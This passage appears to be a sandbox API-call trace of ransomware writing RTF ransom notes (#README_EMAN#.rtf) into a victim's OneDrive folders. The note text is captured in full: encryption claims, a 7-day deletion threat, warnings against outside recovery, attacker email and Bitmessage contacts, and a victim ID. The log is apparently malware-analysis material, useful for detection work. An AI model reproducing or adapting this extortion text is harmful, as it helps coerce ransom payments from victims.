y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n³:Ý\x11\x97b\x1c\x19dÁÎ\x1dتxU¼É¯\x84\x82\x186Ó\x19", lpUsedDefaultChar=0x0) returned 8717 [0301.692] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0301.692] CloseHandle (hObject=0x27c) returned 1 [0301.692] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\#readme_eman#.rtf")) returned 0x20 [0301.692] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\am-et\\#readme_eman#.rtf")) returned 0xffffffff [0301.693] GetLastError () returned 0x2 [0301.693] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\am-et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\am-et\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0301.693] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.693] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 